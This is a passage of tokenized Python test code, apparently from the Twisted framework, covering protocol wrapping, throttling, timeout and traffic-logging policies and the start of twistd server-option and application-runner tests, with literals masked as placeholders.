( data ) <EOL> class Server ( protocol . ServerFactory ) : <EOL> """<STR_LIT>""" <EOL> protocol = EchoProtocol <EOL> class TestableThrottlingFactory ( policies . ThrottlingFactory ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , clock , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> policies . ThrottlingFactory . __init__ ( self , * args , ** kwargs ) <EOL> self . clock = clock <EOL> def callLater ( self , period , func ) : <EOL> """<STR_LIT>""" <EOL> return self . clock . callLater ( period , func ) <EOL> class TestableTimeoutFactory ( policies . TimeoutFactory ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , clock , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> policies . TimeoutFactory . __init__ ( self , * args , ** kwargs ) <EOL> self . clock = clock <EOL> def callLater ( self , period , func ) : <EOL> """<STR_LIT>""" <EOL> return self . clock . callLater ( period , func ) <EOL> class WrapperTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_protocolFactoryAttribute ( self ) : <EOL> """<STR_LIT>""" <EOL> f = Server ( ) <EOL> wf = policies . WrappingFactory ( f ) <EOL> p = wf . buildProtocol ( address . IPv4Address ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> self . assertIdentical ( p . wrappedProtocol . factory , f ) <EOL> def test_transportInterfaces ( self ) : <EOL> """<STR_LIT>""" <EOL> class IStubTransport ( Interface ) : <EOL> pass <EOL> class StubTransport : <EOL> implements ( IStubTransport ) <EOL> implementedBy ( policies . ProtocolWrapper ) <EOL> proto = protocol . Protocol ( ) <EOL> wrapper = policies . ProtocolWrapper ( policies . WrappingFactory ( None ) , proto ) <EOL> wrapper . makeConnection ( StubTransport ( ) ) <EOL> self . assertTrue ( IStubTransport . providedBy ( proto . transport ) ) <EOL> def test_factoryLogPrefix ( self ) : <EOL> """<STR_LIT>""" <EOL> server = Server ( ) <EOL> factory = policies . WrappingFactory ( server ) <EOL> self . assertEqual ( "<STR_LIT>" , factory . logPrefix ( ) ) <EOL> def test_factoryLogPrefixFallback ( self ) : <EOL> """<STR_LIT>""" <EOL> class NoFactory ( object ) : <EOL> pass <EOL> server = NoFactory ( ) <EOL> factory = policies . WrappingFactory ( server ) <EOL> self . assertEqual ( "<STR_LIT>" , factory . logPrefix ( ) ) <EOL> def test_protocolLogPrefix ( self ) : <EOL> """<STR_LIT>""" <EOL> server = Server ( ) <EOL> factory = policies . WrappingFactory ( server ) <EOL> protocol = factory . buildProtocol ( <EOL> address . IPv4Address ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( "<STR_LIT>" , <EOL> protocol . logPrefix ( ) ) <EOL> def test_protocolLogPrefixFallback ( self ) : <EOL> """<STR_LIT>""" <EOL> class NoProtocol ( object ) : <EOL> pass <EOL> server = Server ( ) <EOL> server . protocol = NoProtocol <EOL> factory = policies . WrappingFactory ( server ) <EOL> protocol = factory . buildProtocol ( <EOL> address . IPv4Address ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( "<STR_LIT>" , <EOL> protocol . logPrefix ( ) ) <EOL> class WrappingFactory ( policies . WrappingFactory ) : <EOL> protocol = lambda s , f , p : p <EOL> def startFactory ( self ) : <EOL> policies . WrappingFactory . startFactory ( self ) <EOL> self . deferred . callback ( None ) <EOL> class ThrottlingTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_limit ( self ) : <EOL> """<STR_LIT>""" <EOL> server = Server ( ) <EOL> c1 , c2 , c3 , c4 = [ SimpleProtocol ( ) for i in range ( <NUM_LIT:4> ) ] <EOL> tServer = policies . ThrottlingFactory ( server , <NUM_LIT:2> ) <EOL> wrapTServer = WrappingFactory ( tServer ) <EOL> wrapTServer . deferred = defer . Deferred ( ) <EOL> p = reactor . listenTCP ( <NUM_LIT:0> , wrapTServer , interface = "<STR_LIT:127.0.0.1>" ) <EOL> n = p . getHost ( ) . port <EOL> def _connect123 ( results ) : <EOL> reactor . connectTCP ( "<STR_LIT:127.0.0.1>" , n , SillyFactory ( c1 ) ) <EOL> c1 . dConnected . addCallback ( <EOL> lambda r : reactor . connectTCP ( "<STR_LIT:127.0.0.1>" , n , SillyFactory ( c2 ) ) ) <EOL> c2 . dConnected . addCallback ( <EOL> lambda r : reactor . connectTCP ( "<STR_LIT:127.0.0.1>" , n , SillyFactory ( c3 ) ) ) <EOL> return c3 . dDisconnected <EOL> def _check123 ( results ) : <EOL> self . assertEqual ( [ c . connected for c in c1 , c2 , c3 ] , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> self . assertEqual ( [ c . disconnected for c in c1 , c2 , c3 ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> self . assertEqual ( len ( tServer . protocols . keys ( ) ) , <NUM_LIT:2> ) <EOL> return results <EOL> def _lose1 ( results ) : <EOL> c1 . transport . loseConnection ( ) <EOL> return c1 . dDisconnected <EOL> def _connect4 ( results ) : <EOL> reactor . connectTCP ( "<STR_LIT:127.0.0.1>" , n , SillyFactory ( c4 ) ) <EOL> return c4 . dConnected <EOL> def _check4 ( results ) : <EOL> self . assertEqual ( c4 . connected , <NUM_LIT:1> ) <EOL> self . assertEqual ( c4 . disconnected , <NUM_LIT:0> ) <EOL> return results <EOL> def _cleanup ( results ) : <EOL> for c in c2 , c4 : <EOL> c . transport . loseConnection ( ) <EOL> return defer . DeferredList ( [ <EOL> defer . maybeDeferred ( p . stopListening ) , <EOL> c2 . dDisconnected , <EOL> c4 . dDisconnected ] ) <EOL> wrapTServer . deferred . addCallback ( _connect123 ) <EOL> wrapTServer . deferred . addCallback ( _check123 ) <EOL> wrapTServer . deferred . addCallback ( _lose1 ) <EOL> wrapTServer . deferred . addCallback ( _connect4 ) <EOL> wrapTServer . deferred . addCallback ( _check4 ) <EOL> wrapTServer . deferred . addCallback ( _cleanup ) <EOL> return wrapTServer . deferred <EOL> def test_writeLimit ( self ) : <EOL> """<STR_LIT>""" <EOL> server = Server ( ) <EOL> tServer = TestableThrottlingFactory ( task . Clock ( ) , server , writeLimit = <NUM_LIT:10> ) <EOL> port = tServer . buildProtocol ( address . IPv4Address ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , <NUM_LIT:0> ) ) <EOL> tr = StringTransportWithDisconnection ( ) <EOL> tr . protocol = port <EOL> port . makeConnection ( tr ) <EOL> port . producer = port . wrappedProtocol <EOL> port . dataReceived ( "<STR_LIT>" ) <EOL> port . dataReceived ( "<STR_LIT>" ) <EOL> self . assertEqual ( tr . value ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( tServer . writtenThisSecond , <NUM_LIT:20> ) <EOL> self . assertFalse ( port . wrappedProtocol . paused ) <EOL> tServer . clock . advance ( <NUM_LIT> ) <EOL> self . assertEqual ( tServer . writtenThisSecond , <NUM_LIT:0> ) <EOL> self . assertTrue ( port . wrappedProtocol . paused ) <EOL> tServer . clock . advance ( <NUM_LIT> ) <EOL> self . assertEqual ( tServer . writtenThisSecond , <NUM_LIT:0> ) <EOL> self . assertFalse ( port . wrappedProtocol . paused ) <EOL> def test_readLimit ( self ) : <EOL> """<STR_LIT>""" <EOL> server = Server ( ) <EOL> tServer = TestableThrottlingFactory ( task . Clock ( ) , server , readLimit = <NUM_LIT:10> ) <EOL> port = tServer . buildProtocol ( address . IPv4Address ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , <NUM_LIT:0> ) ) <EOL> tr = StringTransportWithDisconnection ( ) <EOL> tr . protocol = port <EOL> port . makeConnection ( tr ) <EOL> port . dataReceived ( "<STR_LIT>" ) <EOL> port . dataReceived ( "<STR_LIT>" ) <EOL> self . assertEqual ( tr . value ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( tServer . readThisSecond , <NUM_LIT:20> ) <EOL> tServer . clock . advance ( <NUM_LIT> ) <EOL> self . assertEqual ( tServer . readThisSecond , <NUM_LIT:0> ) <EOL> self . assertEqual ( tr . producerState , '<STR_LIT>' ) <EOL> tServer . clock . advance ( <NUM_LIT> ) <EOL> self . assertEqual ( tServer . readThisSecond , <NUM_LIT:0> ) <EOL> self . assertEqual ( tr . producerState , '<STR_LIT>' ) <EOL> tr . clear ( ) <EOL> port . dataReceived ( "<STR_LIT>" ) <EOL> port . dataReceived ( "<STR_LIT>" ) <EOL> self . assertEqual ( tr . value ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( tServer . readThisSecond , <NUM_LIT:20> ) <EOL> tServer . clock . advance ( <NUM_LIT> ) <EOL> self . assertEqual ( tServer . readThisSecond , <NUM_LIT:0> ) <EOL> self . assertEqual ( tr . producerState , '<STR_LIT>' ) <EOL> tServer . clock . advance ( <NUM_LIT> ) <EOL> self . assertEqual ( tServer . readThisSecond , <NUM_LIT:0> ) <EOL> self . assertEqual ( tr . producerState , '<STR_LIT>' ) <EOL> class TimeoutTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . clock = task . Clock ( ) <EOL> wrappedFactory = protocol . ServerFactory ( ) <EOL> wrappedFactory . protocol = SimpleProtocol <EOL> self . factory = TestableTimeoutFactory ( self . clock , wrappedFactory , <NUM_LIT:3> ) <EOL> self . proto = self . factory . buildProtocol ( <EOL> address . IPv4Address ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> self . transport = StringTransportWithDisconnection ( ) <EOL> self . transport . protocol = self . proto <EOL> self . proto . makeConnection ( self . transport ) <EOL> def test_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ] ) <EOL> self . failIf ( self . proto . wrappedProtocol . disconnected ) <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT> ] ) <EOL> self . failUnless ( self . proto . wrappedProtocol . disconnected ) <EOL> def test_sendAvoidsTimeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT:1.0> ] ) <EOL> self . failIf ( self . proto . wrappedProtocol . disconnected ) <EOL> self . proto . write ( '<STR_LIT>' ) <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> self . failIf ( self . proto . wrappedProtocol . disconnected ) <EOL> self . proto . writeSequence ( [ '<STR_LIT>' ] * <NUM_LIT:3> ) <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> self . failIf ( self . proto . wrappedProtocol . disconnected ) <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT> ] ) <EOL> self . failUnless ( self . proto . wrappedProtocol . disconnected ) <EOL> def test_receiveAvoidsTimeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:0.5> ] ) <EOL> self . failIf ( self . proto . wrappedProtocol . disconnected ) <EOL> self . proto . dataReceived ( '<STR_LIT>' ) <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> self . failIf ( self . proto . wrappedProtocol . disconnected ) <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> self . failUnless ( self . proto . wrappedProtocol . disconnected ) <EOL> class TimeoutTester ( protocol . Protocol , policies . TimeoutMixin ) : <EOL> """<STR_LIT>""" <EOL> timeOut = <NUM_LIT:3> <EOL> timedOut = False <EOL> def __init__ ( self , clock ) : <EOL> """<STR_LIT>""" <EOL> self . clock = clock <EOL> def connectionMade ( self ) : <EOL> """<STR_LIT>""" <EOL> self . setTimeout ( self . timeOut ) <EOL> def dataReceived ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . resetTimeout ( ) <EOL> protocol . Protocol . dataReceived ( self , data ) <EOL> def connectionLost ( self , reason = None ) : <EOL> """<STR_LIT>""" <EOL> self . setTimeout ( None ) <EOL> def timeoutConnection ( self ) : <EOL> """<STR_LIT>""" <EOL> self . timedOut = True <EOL> def callLater ( self , timeout , func , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . clock . callLater ( timeout , func , * args , ** kwargs ) <EOL> class TestTimeout ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . clock = task . Clock ( ) <EOL> self . proto = TimeoutTester ( self . clock ) <EOL> def test_overriddenCallLater ( self ) : <EOL> """<STR_LIT>""" <EOL> self . proto . setTimeout ( <NUM_LIT:10> ) <EOL> self . assertEqual ( len ( self . clock . calls ) , <NUM_LIT:1> ) <EOL> def test_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . proto . makeConnection ( StringTransport ( ) ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> self . failIf ( self . proto . timedOut ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT:1.0> ] ) <EOL> self . failUnless ( self . proto . timedOut ) <EOL> def test_noTimeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . proto . makeConnection ( StringTransport ( ) ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> self . failIf ( self . proto . timedOut ) <EOL> self . proto . dataReceived ( '<STR_LIT>' ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:0.5> ] ) <EOL> self . failIf ( self . proto . timedOut ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT:1.0> ] ) <EOL> self . failUnless ( self . proto . timedOut ) <EOL> def test_resetTimeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . proto . timeOut = None <EOL> self . proto . makeConnection ( StringTransport ( ) ) <EOL> self . proto . setTimeout ( <NUM_LIT:1> ) <EOL> self . assertEqual ( self . proto . timeOut , <NUM_LIT:1> ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT> ] ) <EOL> self . failIf ( self . proto . timedOut ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT> ] ) <EOL> self . failUnless ( self . proto . timedOut ) <EOL> def test_cancelTimeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . proto . timeOut = <NUM_LIT:5> <EOL> self . proto . makeConnection ( StringTransport ( ) ) <EOL> self . proto . setTimeout ( None ) <EOL> self . assertEqual ( self . proto . timeOut , None ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> ] ) <EOL> self . failIf ( self . proto . timedOut ) <EOL> def test_return ( self ) : <EOL> """<STR_LIT>""" <EOL> self . proto . timeOut = <NUM_LIT:5> <EOL> self . assertEqual ( self . proto . setTimeout ( <NUM_LIT:10> ) , <NUM_LIT:5> ) <EOL> self . assertEqual ( self . proto . setTimeout ( None ) , <NUM_LIT:10> ) <EOL> self . assertEqual ( self . proto . setTimeout ( <NUM_LIT:1> ) , None ) <EOL> self . assertEqual ( self . proto . timeOut , <NUM_LIT:1> ) <EOL> self . proto . setTimeout ( None ) <EOL> class LimitTotalConnectionsFactoryTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def testConnectionCounting ( self ) : <EOL> factory = policies . LimitTotalConnectionsFactory ( ) <EOL> factory . protocol = protocol . Protocol <EOL> self . assertEqual ( <NUM_LIT:0> , factory . connectionCount ) <EOL> p1 = factory . buildProtocol ( None ) <EOL> self . assertEqual ( <NUM_LIT:1> , factory . connectionCount ) <EOL> p2 = factory . buildProtocol ( None ) <EOL> self . assertEqual ( <NUM_LIT:2> , factory . connectionCount ) <EOL> p1 . connectionLost ( None ) <EOL> self . assertEqual ( <NUM_LIT:1> , factory . connectionCount ) <EOL> p2 . connectionLost ( None ) <EOL> self . assertEqual ( <NUM_LIT:0> , factory . connectionCount ) <EOL> def testConnectionLimiting ( self ) : <EOL> factory = policies . LimitTotalConnectionsFactory ( ) <EOL> factory . protocol = protocol . Protocol <EOL> factory . connectionLimit = <NUM_LIT:1> <EOL> p = factory . buildProtocol ( None ) <EOL> self . assertNotEqual ( None , p ) <EOL> self . assertEqual ( <NUM_LIT:1> , factory . connectionCount ) <EOL> self . assertEqual ( None , factory . buildProtocol ( None ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , factory . connectionCount ) <EOL> class OverflowProtocol ( protocol . Protocol ) : <EOL> def connectionMade ( self ) : <EOL> factory . overflowed = True <EOL> factory . overflowProtocol = OverflowProtocol <EOL> factory . overflowed = False <EOL> op = factory . buildProtocol ( None ) <EOL> op . makeConnection ( None ) <EOL> self . assertEqual ( True , factory . overflowed ) <EOL> self . assertEqual ( <NUM_LIT:2> , factory . connectionCount ) <EOL> p . connectionLost ( None ) <EOL> self . assertEqual ( <NUM_LIT:1> , factory . connectionCount ) <EOL> op . connectionLost ( None ) <EOL> self . assertEqual ( <NUM_LIT:0> , factory . connectionCount ) <EOL> class WriteSequenceEchoProtocol ( EchoProtocol ) : <EOL> def dataReceived ( self , bytes ) : <EOL> if bytes . find ( '<STR_LIT>' ) != - <NUM_LIT:1> : <EOL> self . transport . writeSequence ( [ bytes ] ) <EOL> else : <EOL> EchoProtocol . dataReceived ( self , bytes ) <EOL> class TestLoggingFactory ( policies . TrafficLoggingFactory ) : <EOL> openFile = None <EOL> def open ( self , name ) : <EOL> assert self . openFile is None , "<STR_LIT>" <EOL> self . openFile = StringIO ( ) <EOL> return self . openFile <EOL> class LoggingFactoryTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_thingsGetLogged ( self ) : <EOL> """<STR_LIT>""" <EOL> wrappedFactory = Server ( ) <EOL> wrappedFactory . protocol = WriteSequenceEchoProtocol <EOL> t = StringTransportWithDisconnection ( ) <EOL> f = TestLoggingFactory ( wrappedFactory , '<STR_LIT:test>' ) <EOL> p = f . buildProtocol ( ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> t . protocol = p <EOL> p . makeConnection ( t ) <EOL> v = f . openFile . getvalue ( ) <EOL> self . failUnless ( '<STR_LIT:*>' in v , "<STR_LIT>" % ( v , ) ) <EOL> self . failIf ( t . value ( ) ) <EOL> p . dataReceived ( '<STR_LIT>' ) <EOL> v = f . openFile . getvalue ( ) <EOL> self . assertIn ( "<STR_LIT>" , v ) <EOL> self . assertIn ( "<STR_LIT>" , v ) <EOL> self . assertEqual ( t . value ( ) , '<STR_LIT>' ) <EOL> t . clear ( ) <EOL> p . dataReceived ( '<STR_LIT>' ) <EOL> v = f . openFile . getvalue ( ) <EOL> self . assertIn ( "<STR_LIT>" , v ) <EOL> self . assertEqual ( t . value ( ) , '<STR_LIT>' ) <EOL> p . loseConnection ( ) <EOL> v = f . openFile . getvalue ( ) <EOL> self . assertIn ( '<STR_LIT>' , v ) <EOL> def test_counter ( self ) : <EOL> """<STR_LIT>""" <EOL> wrappedFactory = Server ( ) <EOL> f = TestLoggingFactory ( wrappedFactory , '<STR_LIT:test>' ) <EOL> self . assertEqual ( f . _counter , <NUM_LIT:0> ) <EOL> f . buildProtocol ( ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( f . _counter , <NUM_LIT:1> ) <EOL> f . openFile = None <EOL> f . buildProtocol ( ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( f . _counter , <NUM_LIT:2> ) <EOL> f . resetCounter ( ) <EOL> self . assertEqual ( f . _counter , <NUM_LIT:0> ) </s>
<s> """<STR_LIT>""" <EOL> import signal , inspect , errno <EOL> import os , sys , StringIO <EOL> try : <EOL> import pwd , grp <EOL> except ImportError : <EOL> pwd = grp = None <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> from zope . interface import implements <EOL> from zope . interface . verify import verifyObject <EOL> from twisted . trial import unittest <EOL> from twisted . test . test_process import MockOS <EOL> from twisted import plugin <EOL> from twisted . application . service import IServiceMaker <EOL> from twisted . application import service , app , reactors <EOL> from twisted . scripts import twistd <EOL> from twisted . python import log <EOL> from twisted . python . usage import UsageError <EOL> from twisted . python . log import ILogObserver <EOL> from twisted . python . versions import Version <EOL> from twisted . python . components import Componentized <EOL> from twisted . internet . defer import Deferred <EOL> from twisted . internet . interfaces import IReactorDaemonize <EOL> from twisted . python . fakepwd import UserDatabase <EOL> try : <EOL> from twisted . python import syslog <EOL> except ImportError : <EOL> syslog = None <EOL> try : <EOL> from twisted . scripts import _twistd_unix <EOL> except ImportError : <EOL> _twistd_unix = None <EOL> else : <EOL> from twisted . scripts . _twistd_unix import UnixApplicationRunner <EOL> from twisted . scripts . _twistd_unix import UnixAppLogger <EOL> try : <EOL> import profile <EOL> except ImportError : <EOL> profile = None <EOL> try : <EOL> import hotshot <EOL> import hotshot . stats <EOL> except ( ImportError , SystemExit ) : <EOL> hotshot = None <EOL> try : <EOL> import pstats <EOL> import cProfile <EOL> except ImportError : <EOL> cProfile = None <EOL> if getattr ( os , '<STR_LIT>' , None ) is None : <EOL> setuidSkip = "<STR_LIT>" <EOL> else : <EOL> setuidSkip = None <EOL> def patchUserDatabase ( patch , user , uid , group , gid ) : <EOL> """<STR_LIT>""" <EOL> pwent = pwd . getpwuid ( os . getuid ( ) ) <EOL> grent = grp . getgrgid ( os . getgid ( ) ) <EOL> database = UserDatabase ( ) <EOL> database . addUser ( <EOL> user , pwent . pw_passwd , uid , pwent . pw_gid , <EOL> pwent . pw_gecos , pwent . pw_dir , pwent . pw_shell ) <EOL> def getgrnam ( name ) : <EOL> result = list ( grent ) <EOL> result [ result . index ( grent . gr_name ) ] = group <EOL> result [ result . index ( grent . gr_gid ) ] = gid <EOL> result = tuple ( result ) <EOL> return { group : result } [ name ] <EOL> patch ( pwd , "<STR_LIT>" , database . getpwnam ) <EOL> patch ( grp , "<STR_LIT>" , getgrnam ) <EOL> class MockServiceMaker ( object ) : <EOL> """<STR_LIT>""" <EOL> tapname = '<STR_LIT>' <EOL> def makeService ( self , options ) : <EOL> """<STR_LIT>""" <EOL> self . options = options <EOL> self . service = service . Service ( ) <EOL> return self . service <EOL> class CrippledAppLogger ( app . AppLogger ) : <EOL> """<STR_LIT>""" <EOL> def start ( self , application ) : <EOL> pass <EOL> class CrippledApplicationRunner ( twistd . _SomeApplicationRunner ) : <EOL> """<STR_LIT>""" <EOL> loggerFactory = CrippledAppLogger <EOL> def preApplication ( self ) : <EOL> pass <EOL> def postApplication ( self ) : <EOL> pass <EOL> class ServerOptionsTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_subCommands ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakePlugin ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . tapname = name <EOL> self . _options = '<STR_LIT>' + name <EOL> self . description = '<STR_LIT>' + name <EOL> def options ( self ) : <EOL> return self . _options <EOL> apple = FakePlugin ( '<STR_LIT>' ) <EOL> banana = FakePlugin ( '<STR_LIT>' ) <EOL> coconut = FakePlugin ( '<STR_LIT>' ) <EOL> donut = FakePlugin ( '<STR_LIT>' ) <EOL> def getPlugins ( interface ) : <EOL> self . assertEqual ( interface , IServiceMaker ) <EOL> yield coconut <EOL> yield banana <EOL> yield donut <EOL> yield apple <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertEqual ( config . _getPlugins , plugin . getPlugins ) <EOL> config . _getPlugins = getPlugins <EOL> subCommands = config . subCommands <EOL> expectedOrder = [ apple , banana , coconut , donut ] <EOL> for subCommand , expectedCommand in zip ( subCommands , expectedOrder ) : <EOL> name , shortcut , parserClass , documentation = subCommand <EOL> self . assertEqual ( name , expectedCommand . tapname ) <EOL> self . assertEqual ( shortcut , None ) <EOL> self . assertEqual ( parserClass ( ) , expectedCommand . _options ) , <EOL> self . assertEqual ( documentation , expectedCommand . description ) <EOL> def test_sortedReactorHelp ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakeReactorInstaller ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . shortName = '<STR_LIT>' + name <EOL> self . description = '<STR_LIT>' + name <EOL> apple = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> banana = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> coconut = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> donut = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> def getReactorTypes ( ) : <EOL> yield coconut <EOL> yield banana <EOL> yield donut <EOL> yield apple <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertEqual ( config . _getReactorTypes , reactors . getReactorTypes ) <EOL> config . _getReactorTypes = getReactorTypes <EOL> config . messageOutput = StringIO . StringIO ( ) <EOL> self . assertRaises ( SystemExit , config . parseOptions , [ '<STR_LIT>' ] ) <EOL> helpOutput = config . messageOutput . getvalue ( ) <EOL> indexes = [ ] <EOL> for reactor in apple , banana , coconut , donut : <EOL> def getIndex ( s ) : <EOL> self . assertIn ( s , helpOutput ) <EOL> indexes . append ( helpOutput . index ( s ) ) <EOL> getIndex ( reactor . shortName ) <EOL> getIndex ( reactor . description ) <EOL> self . assertEqual ( <EOL> indexes , sorted ( indexes ) , <EOL> '<STR_LIT>' % ( <EOL> helpOutput , ) ) <EOL> def test_postOptionsSubCommandCausesNoSave ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . subCommand = '<STR_LIT>' <EOL> config . postOptions ( ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , True ) <EOL> def test_postOptionsNoSubCommandSavesAsUsual ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . postOptions ( ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , False ) <EOL> def test_listAllProfilers ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> helpOutput = str ( config ) <EOL> for profiler in app . AppProfiler . profilers : <EOL> self . assertIn ( profiler , helpOutput ) <EOL> def test_defaultUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , None ) <EOL> def test_umask ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . parseOptions ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> config . parseOptions ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> def test_invalidUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertRaises ( UsageError , config . parseOptions , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if _twistd_unix is None : <EOL> msg = "<STR_LIT>" <EOL> test_defaultUmask . skip = test_umask . skip = test_invalidUmask . skip = msg <EOL> def test_unimportableConfiguredLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> e = self . assertRaises ( UsageError , config . parseOptions , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertTrue ( e . args [ <NUM_LIT:0> ] . startswith ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> self . assertNotIn ( '<STR_LIT:\n>' , e . args [ <NUM_LIT:0> ] ) <EOL> def test_badAttributeWithConfiguredLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> e = self . assertRaises ( UsageError , config . parseOptions , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertTrue ( e . args [ <NUM_LIT:0> ] . startswith ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> self . assertNotIn ( '<STR_LIT:\n>' , e . args [ <NUM_LIT:0> ] ) <EOL> class TapFileTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . tapfile = self . mktemp ( ) <EOL> f = file ( self . tapfile , '<STR_LIT:wb>' ) <EOL> pickle . dump ( service . Application ( "<STR_LIT>" ) , f ) <EOL> f . close ( ) <EOL> def test_createOrGetApplicationWithTapFile ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . parseOptions ( [ '<STR_LIT>' , self . tapfile ] ) <EOL> application = CrippledApplicationRunner ( config ) . createOrGetApplication ( ) <EOL> self . assertEqual ( service . IService ( application ) . name , '<STR_LIT>' ) <EOL> class TestLoggerFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , runner ) : <EOL> self . runner = runner <EOL> def start ( self , application ) : <EOL> """<STR_LIT>""" <EOL> self . runner . order . append ( "<STR_LIT>" ) <EOL> self . runner . hadApplicationLogObserver = hasattr ( self . runner , <EOL> '<STR_LIT>' ) <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> class TestApplicationRunner ( app . ApplicationRunner ) : <EOL> """<STR_LIT>""" <EOL> 